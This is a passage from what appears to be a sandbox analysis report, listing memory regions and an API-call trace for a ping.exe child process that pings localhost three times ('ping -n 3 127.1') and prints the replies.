0x0 region_type = private name = "private_0x000000007f71f000" filename = "" Region: id = 3615 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3616 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3617 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3618 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3623 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3624 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3625 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3626 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3647 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3648 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3649 start_va = 0xa0000 end_va = 0xa3fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3650 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3651 start_va = 0x2d0000 end_va = 0x34dfff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3652 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3653 start_va = 0x73360000 end_va = 0x7336efff entry_point = 0x73360000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 3654 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 3655 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3656 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3657 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3658 start_va = 0x7f5f0000 end_va = 0x7f6effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5f0000" filename = "" Thread: id = 210 os_tid = 0x8d8 Process: id = "69" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x7373000" os_pid = "0xb44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3706 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 3707 start_va = 0x9b0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 3708 start_va = 0x9d0000 end_va = 0x9d1fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 3709 start_va = 0x9e0000 end_va = 0x9eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 3710 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 3711 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 3712 start_va = 0xa70000 end_va = 0xa73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 3713 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 3714 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3715 start_va = 0x7ef30000 end_va = 0x7ef52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef30000" filename = "" Region: id = 3716 start_va = 0x7ef5b000 end_va = 0x7ef5dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef5b000" filename = "" Region: id = 3717 start_va = 0x7ef5e000 end_va = 0x7ef5efff entry_point = 0x0 region_type = private name = "private_0x000000007ef5e000" filename = "" Region: id = 3718 start_va = 0x7ef5f000 end_va = 0x7ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef5f000" filename = "" Region: id = 3719 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3720 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3721 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3722 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3723 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 3724 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 3725 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3726 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3727 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3728 start_va = 0x9b0000 end_va = 0x9bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 3729 start_va = 0x9c0000 end_va = 0x9c3fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 3730 start_va = 0xaa0000 end_va = 0xb1dfff entry_point = 0xaa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3731 start_va = 0xb90000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3732 start_va = 0xdc0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 3733 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3734 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3735 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3736 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3737 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3738 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3739 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3740 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3741 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3742 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3743 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3744 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3745 start_va = 0x7ee30000 end_va = 0x7ef2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee30000" filename = "" Region: id = 3746 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 3747 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 3748 start_va = 0x7ef58000 end_va = 0x7ef5afff entry_point = 0x0 region_type = private name = "private_0x000000007ef58000" filename = "" Region: id = 3749 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3750 start_va = 0x9d0000 end_va = 0x9d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 3751 start_va = 0xb60000 end_va = 0xb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 3752 start_va = 0xb70000 end_va = 0xb72fff entry_point = 0xb70000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 3753 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3754 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 3755 start_va = 0x7ef55000 end_va = 0x7ef57fff entry_point = 0x0 region_type = private name = "private_0x000000007ef55000" filename = "" Thread: id = 214 os_tid = 0x6a8 [0083.800] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0083.800] __set_app_type (_Type=0x1) [0083.800] __p__fmode () returned 0x76ea1768 [0083.800] __p__commode () returned 0x76ea176c [0083.800] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0083.800] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0083.800] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.801] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.801] _fileno (_File=0x76ea4c28) returned 1 [0083.801] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.801] GetFileType (hFile=0x28) returned 0x2 [0083.801] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f090 | out: lpMode=0xa6f090) returned 0 [0083.801] GetLastError () returned 0x6 [0083.802] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6eff4, nSize=0x50 | out: lpBuffer="䤐Ü") returned 0x0 [0083.802] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0083.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xa6f0ac | out: phkResult=0xa6f0ac*=0x88) returned 0x0 [0083.804] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xa6f0a0, lpData=0xa6f0a8, lpcbData=0xa6f0a4*=0x4 | out: lpType=0xa6f0a0*=0x0, lpData=0xa6f0a8*=0x0, lpcbData=0xa6f0a4*=0x4) returned 0x2 [0083.804] RegCloseKey (hKey=0x88) returned 0x0 [0083.804] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xa6f070*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xa6f0ac | out: ppResult=0xa6f0ac*=0xdcc4a8*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xdc8a78*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0083.804] FreeAddrInfoW (pAddrInfo=0xdcc4a8*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xdc8a78*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0083.804] IcmpCreateFile () returned 0xdc6c60 [0083.807] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xdcc3b8 [0083.807] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xdd5270 [0083.808] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xa6f1a8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0083.809] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="竈Ý充¦┗\x94䰨盪❋") returned 0x14 [0083.815] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.816] GetFileType (hFile=0x28) returned 0x2 [0083.816] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0083.816] GetLastError () returned 0x6 [0083.816] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦❋") returned 0x0 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0083.816] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0083.816] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xdd7b00 [0083.816] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xdd7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _write (in: _FileHandle=1, _Buf=0xdd7b00*, _MaxCharCount=0x14 | out: _Buf=0xdd7b00*) returned 20 [0083.816] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0083.816] LocalFree (hMem=0xdd7b00) returned 0x0 [0083.816] LocalFree (hMem=0xdd7ac8) returned 0x0 [0083.816] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="竈Ý充¦▪\x94䰨盪❚") returned 0x18 [0083.816] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.816] GetFileType (hFile=0x28) returned 0x2 [0083.816] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0083.816] GetLastError () returned 0x6 [0083.816] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦❚") returned 0x0 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0083.816] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0083.816] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xdcc2a0 [0083.816] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xdcc2a0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _write (in: _FileHandle=1, _Buf=0xdcc2a0*, _MaxCharCount=0x18 | out: _Buf=0xdcc2a0*) returned 24 [0083.816] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.816] _fileno (_File=0x76ea4c28) returned 1 [0083.816] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0083.816] LocalFree (hMem=0xdcc2a0) returned 0x0 [0083.816] LocalFree (hMem=0xdd7ac8) returned 0x0 [0083.816] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0083.816] IcmpSendEcho2Ex (in: IcmpHandle=0xdc6c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xdcc3b8, RequestSize=0x20, RequestOptions=0xa6f11c, ReplyBuffer=0xdd5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xdd5270) returned 0x1 [0083.817] InetNtopW (in: Family=2, pAddr=0xa6f10c, pStringBuf=0xa6f234, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0083.817] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="笈Ý充¦⛔\x94䰨盪✣") returned 0x16 [0083.818] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.818] GetFileType (hFile=0x28) returned 0x2 [0083.818] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0083.818] GetLastError () returned 0x6 [0083.818] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✣") returned 0x0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.818] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0083.818] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xdd7b40 [0083.818] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xdd7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _write (in: _FileHandle=1, _Buf=0xdd7b40*, _MaxCharCount=0x16 | out: _Buf=0xdd7b40*) returned 22 [0083.818] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.818] LocalFree (hMem=0xdd7b40) returned 0x0 [0083.818] LocalFree (hMem=0xdd7b08) returned 0x0 [0083.818] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="笈Ý充¦⛿\x94䰨盪✼") returned 0x9 [0083.818] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.818] GetFileType (hFile=0x28) returned 0x2 [0083.818] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f064 | out: lpMode=0xa6f064) returned 0 [0083.818] GetLastError () returned 0x6 [0083.818] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efc8, nSize=0x50 | out: lpBuffer="¦✼") returned 0x0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.818] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.818] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc89b8 [0083.818] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xdc89b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _write (in: _FileHandle=1, _Buf=0xdc89b8*, _MaxCharCount=0x9 | out: _Buf=0xdc89b8*) returned 9 [0083.818] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.818] LocalFree (hMem=0xdc89b8) returned 0x0 [0083.818] LocalFree (hMem=0xdd7b08) returned 0x0 [0083.818] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xa6f0a4, nSize=0x0, Arguments=0xa6f0a0 | out: lpBuffer="笈Ý充¦➷\x94䰨盪✧") returned 0x9 [0083.818] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _get_osfhandle (_FileHandle=1) returned 0x28 [0083.818] GetFileType (hFile=0x28) returned 0x2 [0083.818] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa6f068 | out: lpMode=0xa6f068) returned 0 [0083.818] GetLastError () returned 0x6 [0083.818] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa6efcc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0083.818] _fileno (_File=0x76ea4c28) returned 1 [0083.818] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.818] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.818] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xdc8ac0 [0083.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xdc8ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0083.819] _fileno (_File=0x76ea4c28) returned 1 [0083.819] _write (in: _FileHandle=1, _Buf=0xdc8ac0*, _MaxCharCount=0x9 | out: _Buf=0xdc8ac0*) returned 9 [0083.819] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.819] _fileno (_File=0x76ea4c28) returned 1 [0083.819] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0083.819] LocalFree (hMem=0xdc8ac0) returned 0x0 [0083.819] LocalFree (hMem=0xdd7b08) returned 0x0 [0083.819] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xa6f0a0, nSize=0x0, Arguments=0xa6f09c | out: lpBuffer="笈Ý充¦⟘\x94䰨盪✨") returned 0x9 [0083.819] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0083.819] _fileno (_File=0x76ea4c28) returned 1 [0083.819] _get_osfhandle 